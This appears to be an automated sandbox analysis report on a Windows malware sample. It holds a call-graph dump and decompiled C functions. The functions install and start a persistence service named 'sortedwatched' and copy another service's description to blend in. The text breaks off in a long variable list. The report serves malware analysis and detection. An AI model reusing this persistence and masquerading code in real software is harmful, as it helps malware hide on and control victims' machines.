2970->2971 2972 4076c6 2971->2972 2973 401a52 GetProcessHeap 2972->2973 2974 4088e5 LoadLibraryW 2973->2974 2975 4088fa 2974->2975 2976 4012ff 2 API calls 2975->2976 2977 40891a 2976->2977 2978 40f92d 2977->2978 3056 40f16b OpenSCManagerW 2978->3056 2982 40f942 3062 40f26c 2982->3062 2984 40f947 2985 40f292 GetProcessHeap memset SHGetFolderPathW SHGetFolderPathW 2984->2985 2986 40f94c 2985->2986 2987 40f3c5 8 API calls 2986->2987 2988 40f951 2987->2988 2989 40f43e GetProcessHeap GetComputerNameW WideCharToMultiByte _snprintf 2988->2989 2990 40f956 2989->2990 2991 40f2ee GetProcessHeap lstrlenW SHGetFolderPathW SHGetFolderPathW DeleteFileW 2990->2991 2992 40f95b lstrcmpiW 2991->2992 2993 40f970 2992->2993 2994 40f972 2992->2994 2993->2918 2995 40f63a 10 API calls 2994->2995 2996 40f977 2995->2996 2997 40f980 2996->2997 2998 40f987 2996->2998 2999 40f7a0 24 API calls 2997->2999 3000 401cc2 memset CloseHandle CloseHandle 2998->3000 3001 40f985 2999->3001 3002 40f993 3000->3002 3001->2918 3002->3001 3069 40fa9b 3003->3069 3005 40c6a3 lstrlen 3070 402398 RtlGetVersion GetNativeSystemInfo 3005->3070 3007 40c6b9 3071 401e04 GetPEB 3007->3071 3009 40c6c1 3072 4022d2 3009->3072 3015 40c6e7 3016 40c778 3015->3016 3095 406104 3015->3095 3150 401532 GetProcessHeap HeapFree 3016->3150 3019 40c780 3151 401532 GetProcessHeap HeapFree 3019->3151 3022 40c702 3024 40c715 3022->3024 3122 40f9df 3022->3122 3023 40c759 GetTickCount 3031 40c757 3023->3031 3130 40c9a3 3024->3130 3025 40c788 3025->2843 3029 40c74d 3148 401532 GetProcessHeap HeapFree 3029->3148 3149 401532 GetProcessHeap HeapFree 3031->3149 3032 40c720 3032->3029 3033 40c73e 3032->3033 3133 40f99a 3032->3133 3033->3029 3140 40fd40 3033->3140 3047 401503 3036->3047 3041 402014 CryptGenKey 3043 402030 CryptCreateHash 3041->3043 3044 40205e CryptDestroyKey CryptReleaseContext 3041->3044 3042 402078 3042->2965 3045 402052 CryptDestroyKey 3043->3045 3046 40204e 3043->3046 3044->3042 3045->3044 3046->2965 3055 40150b memset 3047->3055 3049 401509 3050 401f75 CryptAcquireContextW 3049->3050 3051 401ff3 3050->3051 3052 401f98 3050->3052 3051->3041 3051->3042 3053 401fe6 CryptReleaseContext 3052->3053 3054 401fbe CryptImportKey LocalFree 3052->3054 3053->3051 3054->3051 3054->3053 3055->3049 3057 40f17e CloseServiceHandle 3056->3057 3058 40f18f 3056->3058 3057->3058 3059 40f149 3058->3059 3060 401503 memset 3059->3060 3061 40f15e GetModuleFileNameW 3060->3061 3061->2982 3063 401a52 GetProcessHeap 3062->3063 3064 40f27c 3063->3064 3067 40f190 lstrlenW 3064->3067 3068 40f1b4 3067->3068 3069->3005 3070->3007 3071->3009 3152 401943 CreateToolhelp32Snapshot 3072->3152 3075 402318 3076 4014f2 GetProcessHeap 3075->3076 3078 402328 3076->3078 3077 402305 lstrlenW 3077->3075 3077->3077 3079 402376 3078->3079 3081 402334 lstrcpyW lstrlenW 3078->3081 3082 40235c 3078->3082 3080 40238a 3079->3080 3166 401532 GetProcessHeap HeapFree 3079->3166 3087 40fcf6 3080->3087 3081->3078 3159 402424 WideCharToMultiByte 3082->3159 3088 40fd08 3087->3088 3089 40c6dc 3088->3089 3090 4014f2 GetProcessHeap 3088->3090 3091 40c901 3089->3091 3090->3089 3092 40c913 3091->3092 3093 4014f2 GetProcessHeap 3092->3093 3094 40c91d 3093->3094 3094->3015 3177 405e88 3095->3177 3098 406279 3098->3022 3098->3023 3100 406157 3101 406272 3100->3101 3189 40207b 3100->3189 3256 401532 GetProcessHeap HeapFree 3101->3256 3105 406267 3255 401532 GetProcessHeap HeapFree 3105->3255 3107 401a52 GetProcessHeap 3108 406183 3107->3108 3205 405fa4 3108->3205 3111 406254 3254 401532 GetProcessHeap HeapFree 3111->3254 3117 40624c 3253 401532 GetProcessHeap HeapFree 3117->3253 3119 406241 3252 401532 GetProcessHeap HeapFree 3119->3252 3123 40f9f5 3122->3123 3126 40fa87 3122->3126 3124 401a52 GetProcessHeap 3123->3124 3125 40fa09 3124->3125 3125->3126 3127 401a52 GetProcessHeap 3125->3127 3126->3024 3128 40fa3f RegCreateKeyExW 3127->3128 3128->3126 3129 40fa5e RegSetValueExW RegCloseKey 3128->3129 3129->3126 3131 401503 memset 3130->3131 3132 40c9b9 3131->3132 3132->3032 3357 40f883 lstrcpyW lstrlenW GetTickCount 3133->3357 3138 40f9d9 3138->3033 3139 401cc2 3 API calls 3139->3138 3145 40fd52 3140->3145 3142 40fdb7 3142->3029 3143 4014f2 GetProcessHeap 3143->3145 3145->3142 3145->3143 3365 40fc1d 3145->3365 3370 40fb72 3145->3370 3384 40fb2f 3145->3384 3391 40caa6 3145->3391 3148->3031 3149->3016 3150->3019 3151->3025 3153 401961 Process32FirstW 3152->3153 3154 4019a5 3152->3154 3155 401989 3153->3155 3154->3075 3154->3077 3156 40199e CloseHandle 3155->3156 3158 40197b Process32NextW 3155->3158 3167 402255 3155->3167 3156->3154 3158->3155 3160 402367 3159->3160 3161 40244a 3159->3161 3165 401532 GetProcessHeap HeapFree 3160->3165 3162 4014f2 GetProcessHeap 3161->3162 3163 402451 3162->3163 3163->3160 3164 402457 WideCharToMultiByte 3163->3164 3164->3160 3165->3079 3166->3079 3168 40226b 3167->3168 3169 402273 GetCurrentProcessId 3168->3169 3170 4022c8 3168->3170 3169->3170 3171 40227e 3169->3171 3170->3155 3171->3170 3172 402284 GetCurrentProcessId 3171->3172 3172->3170 3173 40228f 3172->3173 3173->3170 3174 4014f2 GetProcessHeap 3173->3174 3175 4022a9 3174->3175 3175->3170 3176 4022af lstrcpyW 3175->3176 3176->3170 3178 405e9c 3177->3178 3179 4014f2 GetProcessHeap 3178->3179 3180 405ea8 3179->3180 3184 405ec8 3180->3184 3257 4027a7 3180->3257 3184->3098 3185 4062d8 3184->3185 3186 4062ea 3185->3186 3187 4014f2 GetProcessHeap 3186->3187 3188 4062f4 3187->3188 3188->3100 3190 402094 3189->3190 3191 4014f2 GetProcessHeap 3190->3191 3192 4020ad 3191->3192 3193 40214a 3192->3193 3194 4020ba CryptDuplicateHash 3192->3194 3193->3105 3193->3107 3195 402143 3194->3195 3196 4020d6 3194->3196 3313 401532 GetProcessHeap HeapFree 3195->3313 3198 4020e6 CryptEncrypt 3196->3198 3199 402136 CryptDestroyHash 3198->3199 3200 402107 3198->3200 3199->3193 3199->3195 3310 401f11 CryptExportKey 3200->3310 3204 40212d 3204->3199 3206 401503 memset 3205->3206 3207 405fbf 3206->3207 3208 401a52 GetProcessHeap 3207->3208 3209 405fce 3208->3209 3314 405f15 lstrlenW GetTickCount 3209->3314 3211 405fd9 3212 401a52 GetProcessHeap 3211->3212 3213 405fef 3212->3213 3214 4014f2 GetProcessHeap 3213->3214 3215 40602a 3214->3215 3216 4060a8 3215->3216 3217 40603e GetTickCount 3215->3217 3216->3111 3224 40140a 3216->3224 3218 40605a 3217->3218 3219 4014f2 GetProcessHeap 3218->3219 3220 406064 3219->3220 3221 406079 3220->3221 3316 401e27 GetTickCount 3220->3316 3318 401532 GetProcessHeap HeapFree 3221->3318 3319 401345 3224->3319 3226 4014c4 3329 401532 GetProcessHeap HeapFree 3226->3329 3228 4014e9 3228->3111 3233 40215a 3228->3233 3230 401a52 GetProcessHeap 3231 401467 3230->3231 3231->3226 3323 401383 3231->3323 3234 40217a 3233->3234 3243 402173 3233->3243 3235 4014f2 GetProcessHeap 3234->3235 3234->3243 3236 40219e 3235->3236 3237 4021a8 CryptDuplicateHash 3236->3237 3236->3243 3238 4021c8 3237->3238 3244 402223 3237->3244 3239 4021d6 CryptDecrypt 3238->3239 3241 402216 CryptDestroyHash 3239->3241 3242 4021f6 CryptVerifySignatureW 3239->3242 3241->3243 3241->3244 3242->3241 3243->3117 3243->3119 3245 405ed3 3243->3245 3337 401532 GetProcessHeap HeapFree 3244->3337 3246 4014f2 GetProcessHeap 3245->3246 3247 405eea 3246->3247 3248 405f0a 3247->3248 3338 402a73 memset 3247->3338 3248->3119 3250 405efd 3250->3248 3342 401532 GetProcessHeap HeapFree 3250->3342 3252->3117 3253->3111 3254->3105 3255->3101 3256->3098 3261 402727 memset 3257->3261 3259 4027b6 3259->3184 3260 401532 GetProcessHeap HeapFree 3259->3260 3260->3184 3262 402759 3261->3262 3266 402752 3261->3266 3267 402594 3262->3267 3266->3259 3274 4025a0 3267->3274 3269 40259c 3269->3266 3270 402629 3269->3270 3272 40263c 3270->3272 3273 402653 3270->3273 3272->3273 3283 4047dd 3272->3283 3273->3266 3276 4025aa 3274->3276 3275 4025b9 3275->3269 3276->3275 3278 40499d 3276->3278 3279 404a03 3278->3279 3280 4049ed memset 3278->3280 3281 404a87 memset 3279->3281 3282 404a9d memset memset 3279->3282 3280->3279 3281->3282 3282->3275 3284 4047ee 3283->3284 3286 404808 3283->3286 3284->3272 3285 4048f4 3298 40436d 3285->3298 3286->3284 3286->3285 3288 4048e1 3286->3288 3294 403e46 3288->3294 3290 4048e8 3290->3284 3302 4037a9 3290->3302 3293 404952 memset memset 3293->3284 3296 403e86 3294->3296 3295 404271 3295->3290 3296->3295 3297 4037a9 8 API calls 3296->3297 3297->3296 3300 404395 3298->3300 3299 40473a 3299->3290 3300->3299 3301 4037a9 8 API calls 3300->3301 3301->3299 3303 4037c7 3302->3303 3304 40378e 6 API calls 3303->3304 3307 4038ff 3303->3307 3304->3307 3305 40378e 6 API calls 3309 40392e memset memset 3305->3309 3307->3305 3307->3309 3308 403bd4 3308->3284 3308->3293 3309->3308 3311 401f39 3310->3311 3311->3199 3312 401f56 CryptGetHashParam 3311->3312 3312->3204 3313->3193 3315 405f3d 3314->3315 3315->3211 3317 401e44 3316->3317 3317->3221 3317->3317 3318->3216 3320 401368 3319->3320 3321 401379 3320->3321 3330 4023e5 MultiByteToWideChar 3320->3330 3321->3226 3321->3230 3324 40139b 3323->3324 3325 4014f2 GetProcessHeap 3324->3325 3326 4013e7 3324->3326 3328 4013b0 3325->3328 3326->3226 3328->3326 3336 401532 GetProcessHeap HeapFree 3328->3336 3329->3228 3331 402401 3330->3331 3332 40241e 3330->3332 3333 4014f2 GetProcessHeap 3331->3333 3332->3321 3334 402409 3333->3334 3334->3332 3335 40240f MultiByteToWideChar 3334->3335 3335->3332 3336->3326 3337->3243 3339 402aa5 3338->3339 3341 402a9e 3338->3341 3339->3341 3343 40284f 3339->3343 3341->3250 3342->3248 3344 402865 3343->3344 3348 40289b 3343->3348 3345 4028af 3344->3345 3344->3348 3349 402917 3344->3349 3350 404ad4 3345->3350 3347 404ad4 6 API calls 3347->3349 3348->3341 3349->3347 3349->3348 3356 404b19 _memset 3350->3356 3351 404e76 memset 3351->3356 3352 404bd9 3352->3348 3353 404e04 memset 3353->3356 3354 404f66 memset memset memset 3354->3356 3355 40533d memset 3355->3356 3356->3351 3356->3352 3356->3353 3356->3354 3356->3355 3363 401e8f GetTickCount 3357->3363 3359 40f8bd 3360 40f8e6 CreateFileW 3359->3360 3361 40f926 3360->3361 3362 40f90d WriteFile CloseHandle 3360->3362 3361->3138 3361->3139 3362->3361 3364 401eb0 3363->3364 3364->3359 3395 401855 3365->3395 3367 40fc5c 3367->3145 3368 40fc2d 3368->3367 3369 40fc43 CreateThread 3368->3369 3369->3367 3408 40fb06 3369->3408 3410 40faa1 SHGetFolderPathW lstrlenW GetTickCount 3370->3410 3373 40f8e6 3 API calls 3374 40fb9d 3373->3374 3375 40fc18 3374->3375 3413 401dcb WTSGetActiveConsoleSessionId 3374->3413 3375->3145 3378 401a52 GetProcessHeap 3379 40fbbd 3378->3379 3417 401d2b 3379->3417 3381 40fbf6 3382 40fbfd CloseHandle CloseHandle 3381->3382 3383 40fc0f CloseHandle 3381->3383 3382->3383 3383->3375 3385 40faa1 4 API calls 3384->3385 3386 40fb46 3385->3386 3387 40f8e6 3 API calls 3386->3387 3388 40fb56 3387->3388 3389 40fb6c 3388->3389 3390 401cc2 3 API calls 3388->3390 3389->3145 3390->3389 3392 40cab7 3391->3392 3393 40cac5 3392->3393 3424 40ca23 3392->3424 3393->3145 3396 401866 3395->3396 3397 401873 VirtualAlloc 3396->3397 3398 401922 3396->3398 3397->3398 3399 401890 3397->3399 3398->3368 3403 40179c 3399->3403 3402 401913 VirtualFree 3402->3398 3404 401819 3403->3404 3406 4017b0 3403->3406 3404->3398 3404->3402 3405 4017be LoadLibraryA 3405->3404 3405->3406 3406->3404 3406->3405 3407 4017ea GetProcAddress 3406->3407 3407->3404 3407->3406 3409 40fb17 3408->3409 3411 401e8f GetTickCount 3410->3411 3412 40fadd 3411->3412 3412->3373 3414 401de3 3413->3414 3415 401de7 DuplicateToken CloseHandle 3414->3415 3416 401dfc 3414->3416 3415->3416 3416->3375 3416->3378 3418 401503 memset 3417->3418 3419 401d48 3418->3419 3420 401d9b 3419->3420 3421 401a52 GetProcessHeap 3419->3421 3420->3381 3422 401d61 3421->3422 3422->3420 3423 401d74 CreateProcessAsUserW 3422->3423 3423->3420 3425 401503 memset 3424->3425 3426 40ca39 3425->3426 3426->3393 3429 40fc67 3430 40fcd4 3429->3430 3433 40fc78 3429->3433 3431 40fc90 WaitForSingleObject 3431->3433 3433->3430 3433->3431 3436 40192a VirtualFree 3433->3436 3437 401532 GetProcessHeap HeapFree 3433->3437 3435 40fcaf CloseHandle 3435->3433 3436->3435 3437->3433 3438 40ff28 IsProcessorFeaturePresent 3439 40ff4e 3438->3439 3440 405a5d 3445 404d56 _memset 3440->3445 3441 405a6b 3442 404e04 memset 3442->3445 3443 404e76 memset 3443->3445 3444 404f66 memset memset memset 3444->3445 3445->3441 3445->3442 3445->3443 3445->3444 3446 40533d memset 3445->3446 3446->3445 3447 40257d GetProcessHeap HeapFree

                  Executed Functions

                  Function 0040F7A0, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 84serviceUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 80%
                  			E0040F7A0() {
				char _v8;
				short _v528;
				void* _t7;
				void* _t15;
				void* _t16;
				void* _t24;
				int _t32;
				void* _t33;
				void* _t35;

				_t32 = 0;
				_v8 = 0;
				_t7 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_t24 = _t7;
				if(_t24 != 0) {
					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
					 *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t33);
					L00401B09(_t34);
					_t15 = CreateServiceW(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0); // executed
					_t35 = _t15;
					if(_t35 != 0) {
						_t16 = E0040F504(_t24,  &_v8); // executed
						if(_t16 != 0) {
							 *0x41353c(_t35, 1, _v8);
							E00401532(_v8);
						}
					} else {
						_t35 = OpenServiceW(_t24, "sortedwatched", 0x10);
					}
					if(_t35 != 0) {
						_t32 = StartServiceW(_t35, _t32, _t32);
						CloseServiceHandle(_t35);
					}
					E0040F6D0(_t24);
					CloseServiceHandle(_t24);
				}
				return _t32;
			}












                  0x0040f7ab
                  0x0040f7b4
                  0x0040f7b7
                  0x0040f7bd
                  0x0040f7c1
                  0x0040f7d7
                  0x0040f7eb
                  0x0040f7f6
                  0x0040f816
                  0x0040f81c
                  0x0040f820
                  0x0040f839
                  0x0040f840
                  0x0040f848
                  0x0040f851
                  0x0040f851
                  0x0040f822
                  0x0040f830
                  0x0040f830
                  0x0040f858
                  0x0040f864
                  0x0040f866
                  0x0040f866
                  0x0040f86e
                  0x0040f874
                  0x0040f87a
                  0x0040f882

                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000104), ref: 0040F7B7
                  • _snwprintf.NTDLL ref: 0040F7EB
                  • CreateServiceW.ADVAPI32(00000000,sortedwatched,sortedwatched,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F816
                  • OpenServiceW.ADVAPI32(00000000,sortedwatched,00000010), ref: 0040F82A
                  • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,0040F111), ref: 0040F848
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040F85D
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F866
                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040F874
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 2587423728-1568575355
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F504, Relevance: 13.6, APIs: 9, Instructions: 120serviceCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 15%
                  			E0040F504(void* __ecx, intOrPtr* __edx) {
				char _v8;
				char _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr _t39;
				void* _t40;
				void* _t48;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				short** _t65;

				_t62 = __ecx;
				_v36 = __edx;
				_v24 = __ecx;
				_push(0);
				_push(0);
				_t48 = 0;
				_push( &_v16);
				_push( &_v8);
				_push(0);
				_push(0);
				_push(3);
				_push(0x30);
				_push(0);
				_push(__ecx);
				if( *0x412fe8() != 0 || GetLastError() != 0xea) {
					L19:
					return _t48;
				} else {
					_t59 = E004014F2(_v8);
					_v32 = _t59;
					if(_t59 == 0) {
						L18:
						goto L19;
					}
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v8);
					_push(_v8);
					_push(_t59);
					_push(3);
					_push(0x30);
					_push(0);
					_push(_t62);
					if( *0x412fe8() == 0) {
						_t61 = _v28;
						goto L16;
					} else {
						_t64 = (GetTickCount() & 0x0000000f) * 0x2c + _t59;
						_t39 = _v16 * 0x2c + _t64;
						_v28 = _t39;
						_t65 =  >=  ? _t59 : _t64;
						_t61 = _v28;
						while(_t65 < _t39) {
							_t40 = OpenServiceW(_v24,  *_t65, 1); // executed
							_v20 = _t40;
							if(_t40 == 0) {
								L13:
								_t39 = _v28;
								_t65 =  &(_t65[0xb]);
								if(_t48 == 0) {
									continue;
								}
								break;
							}
							_push( &_v12);
							_push(0);
							_push(0);
							_push(1);
							_push(_t40);
							if( *0x4135b4() == 0 && GetLastError() == 0x7a) {
								_t61 = E004014F2(_v12);
								if(_t61 != 0) {
									_t48 =  *0x4135b4(_v20, 1, _t61, _v12,  &_v12);
									if(_t48 == 0) {
										E00401532(_t61);
									}
								}
							}
							CloseServiceHandle(_v20);
							goto L13;
						}
						L16:
						E00401532(_v32);
						if(_t48 != 0) {
							 *_v36 = _t61;
						}
						goto L18;
					}
				}
			}



















                  0x0040f50c
                  0x0040f50e
                  0x0040f513
                  0x0040f516
                  0x0040f517
                  0x0040f51b
                  0x0040f51d
                  0x0040f521
                  0x0040f522
                  0x0040f523
                  0x0040f524
                  0x0040f526
                  0x0040f528
                  0x0040f529
                  0x0040f532
                  0x0040f633
                  0x0040f639
                  0x0040f549
                  0x0040f552
                  0x0040f554
                  0x0040f559
                  0x0040f631
                  0x00000000
                  0x0040f631
                  0x0040f564
                  0x0040f565
                  0x0040f566
                  0x0040f56a
                  0x0040f56b
                  0x0040f56e
                  0x0040f56f
                  0x0040f571
                  0x0040f573
                  0x0040f574
                  0x0040f57d
                  0x0040f61d
                  0x00000000
                  0x0040f583
                  0x0040f593
                  0x0040f595
                  0x0040f599
                  0x0040f59c
                  0x0040f59f
                  0x0040f5a2
                  0x0040f5ad
                  0x0040f5b3
                  0x0040f5b8
                  0x0040f611
                  0x0040f611
                  0x0040f614
                  0x0040f619
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040f61b
                  0x0040f5bd
                  0x0040f5be
                  0x0040f5c0
                  0x0040f5c2
                  0x0040f5c4
                  0x0040f5cd
                  0x0040f5e2
                  0x0040f5e6
                  0x0040f5fb
                  0x0040f5ff
                  0x0040f603
                  0x0040f603
                  0x0040f5ff
                  0x0040f5e6
                  0x0040f60b
                  0x00000000
                  0x0040f60b
                  0x0040f620
                  0x0040f623
                  0x0040f62a
                  0x0040f62f
                  0x0040f62f
                  0x00000000
                  0x0040f62a
                  0x0040f57d

                  APIs
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,0040F83E,?,00000000,00000000), ref: 0040F52A
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F538
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,0040F83E,0040F83E,?,00000000,00000000), ref: 0040F575
                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F583
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,0040F83E), ref: 0040F5AD
                  • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5C5
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F5CF
                  • QueryServiceConfig2W.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5F5
                    • Part of subcall function 00401532: GetProcessHeap.KERNEL32(00000000,?,0040F628,?,?,?,?,?,?,?,0040F83E), ref: 00401535
                    • Part of subcall function 00401532: HeapFree.KERNEL32(00000000), ref: 0040153C
                  • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,0040F83E), ref: 0040F60B
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: HeapService$Config2EnumErrorLastProcessQueryServicesStatus$AllocateCloseCountFreeHandleOpenTick
                  • String ID:
                  • API String ID: 2166652104-0
                  • Opcode ID: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction ID: fb962817b9f77482ee3899ed83bed23c765ea0bda143a25e94a62ef856afa488
                  • Opcode Fuzzy Hash: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction Fuzzy Hash: 4E418071A00105BFDB259FA5DC86EEFBBB9EF44700F10013AF901F62A0DA759E068B58
                  Uniqueness

                  Uniqueness Score: 0.19%

                  Function 0040F7A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84serviceUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 42%
                  			E0040F7A0() {
				char _v8;
				short _v528;
				void* _t7;
				void* _t15;
				void* _t16;
				int _t19;
				void* _t24;
				int _t32;
				void* _t33;
				void* _t35;

				_t32 = 0;
				_v8 = 0;
				_t7 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_t24 = _t7;
				if(_t24 != 0) {
					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
					 *0x4143a4( &_v528, 0x104, _t9, 0x416840, _t33);
					L00401B09(_t34);
					_t15 = CreateServiceW(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0); // executed
					_t35 = _t15;
					if(_t35 != 0) {
						_t16 = E0040F504(_t24,  &_v8); // executed
						if(_t16 != 0) {
							 *0x41353c(_t35, 1, _v8);
							E00401532(_v8);
						}
					} else {
						_t35 =  *0x413594(_t24, 0x416530, 0x10);
					}
					if(_t35 != 0) {
						_t19 =  *0x41315c(_t35, _t32, _t32);
						_t32 = _t19;
						 *0x4135a4(_t35);
					}
					E0040F6D0(_t24);
					 *0x4135a4(_t24);
				}
				return _t32;
			}













                  0x0040f7ab
                  0x0040f7b4
                  0x0040f7b7
                  0x0040f7bd
                  0x0040f7c1
                  0x0040f7d7
                  0x0040f7eb
                  0x0040f7f6
                  0x0040f816
                  0x0040f81c
                  0x0040f820
                  0x0040f839
                  0x0040f840
                  0x0040f848
                  0x0040f851
                  0x0040f851
                  0x0040f822
                  0x0040f830
                  0x0040f830
                  0x0040f858
                  0x0040f85d
                  0x0040f864
                  0x0040f866
                  0x0040f866
                  0x0040f86e
                  0x0040f874
                  0x0040f87a
                  0x0040f882

                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,00000104), ref: 0040F7B7
                  • _snwprintf.NTDLL ref: 0040F7EB
                  • CreateServiceW.ADVAPI32(00000000,00416530,00416530,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F816
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateManagerOpenService_snwprintf
                  • String ID: 0eA$g8Cw
                  • API String ID: 2040870185-1352154256
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004076C6, Relevance: 39.0, APIs: 1, Strings: 21, Instructions: 495libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E004076C6(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
